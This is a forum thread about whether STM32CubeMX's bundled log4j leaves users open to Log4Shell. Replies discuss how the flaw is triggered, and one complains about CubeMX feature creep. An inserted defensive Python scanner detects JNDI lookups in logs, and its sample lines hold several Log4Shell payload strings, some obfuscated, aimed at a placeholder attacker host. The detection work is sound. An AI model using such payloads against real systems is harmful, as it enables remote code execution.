Stcube and log4j

Uwe Bonnes
Principal III
Uwe Bonnes
Principal III

Sorry, somehow I managed to drop the question:

During startup, stcube prints a message about log4j. There are known vulnerabilities in log4j. How does this impact stcube and the host system stcube runs on?

TDK
Guru

Apparently the version used is so out of date that it's "safe". Not sure I'd trust that answer.

See: https://community.st.com/s/question/0D53W00001FmB6NSAV/i-am-using-cubemx-there-is-a-significant-security-vulnerability-of-apache-log4j-on-net-cubemx-has-this-issue-if-yes-do-you-have-any-fix-solution

If you feel a post has answered your question, please click "Accept as Solution".

I wonder how exactly an outside attacker could achieve an entry being inserted into CubeIDE/CubeWhatever's log...

Do these programs have open listening IP ports?

JW

It will try to format the log message and if you have certain patterns in the message being logged, it will load an arbitrary file from a web address to do so. So if you can control what is being logged, perhaps if the program logs user input, you're toast.

It is amazing that a program ostensibly designed to log events in a program has gone through so much feature creep that it is even possible for this to happen. I'm not surprised it happened in Java.

I find it all quite interesting.

https://www.trendmicro.com/en_us/research/21/l/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html

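To make the "certain patterns" above concrete from the defender's side, here is an added example (not from this thread and not ST's or Log4j's code) that scans log lines for the JNDI lookup string Log4Shell abuses, first undoing the nested-lookup obfuscation (`${lower:…}`, `${upper:…}`, `${…:-x}`) that detection guidance commonly lists. The host names and log lines are constructed sample data.

```python
import re

# Constructed sample log lines; attacker.example is a placeholder host.
SAMPLE_LOG_LINES = [
    'GET /index.html "Mozilla/5.0"',
    'User-Agent: ${jndi:ldap://attacker.example/a}',
    'X-Api-Version: ${${lower:j}ndi:${lower:r}mi://attacker.example/x}',
    'login user=${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/z}',
    'price=${env:HOME} status=ok',
]

# Innermost ${...} lookup: a body with no further $, { or } inside it.
INNER = re.compile(r'\$\{([^${}]*)\}')
# A JNDI lookup with any scheme, e.g. ${jndi:ldap:...}; matched after decoding.
JNDI = re.compile(r'\$\{\s*jndi\s*:\s*[a-z]+\s*:', re.IGNORECASE)


def resolve_lookup(body):
    """Resolve one innermost Log4j-style lookup the way obfuscated payloads
    rely on: ':-' yields the default value, lower/upper change case.
    Any other lookup is left untouched."""
    if ':-' in body:                       # ${whatever:-x} and ${::-x} -> x
        return body.split(':-', 1)[1]
    if ':' in body:
        prefix, arg = body.split(':', 1)
        if prefix.lower() == 'lower':
            return arg.lower()
        if prefix.lower() == 'upper':
            return arg.upper()
    return '${' + body + '}'


def normalize(line, max_rounds=20):
    """Repeatedly resolve innermost lookups until nothing changes (bounded)."""
    for _ in range(max_rounds):
        before = line
        line = INNER.sub(lambda m: resolve_lookup(m.group(1)), line)
        if line == before:
            break
    return line


def scan(lines):
    """Return (1-based line number, decoded line) for lines carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        decoded = normalize(line)
        if JNDI.search(decoded):
            hits.append((n, decoded))
    return hits
```

Running `scan(SAMPLE_LOG_LINES)` flags lines 2, 3 and 4, reporting each in its decoded form, while the plain `${env:HOME}` line on its own is not a JNDI hit.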

I understand the mechanism of the bug. My question was towards how

> if you can control what is being logged,

can happen in the particular case of Cuben.

JW

> It is amazing that a program ostensibly designed to log events in a program has gone through so much feature creep

That is also the past and future of the CubeMX. It started as a Microcontroller eXplorer and helped managing pins and clocks. Then the "initialization code generator" was added. Officially it's still called like that! But in reality it has gone down the full - "I'm clicking a project together completely in CubeMX. Something doesn't work. I no learn C. Help!!! Thank you, ser!" - mode. And even sane users want more and more customization. Initialization order, priorities, enable/disable by default etc. Eventually it will mimic all of the HAL in a million configurations, it will require the same amount of knowledge and be more complex to configure than writing code, and the project will collapse under its own weight.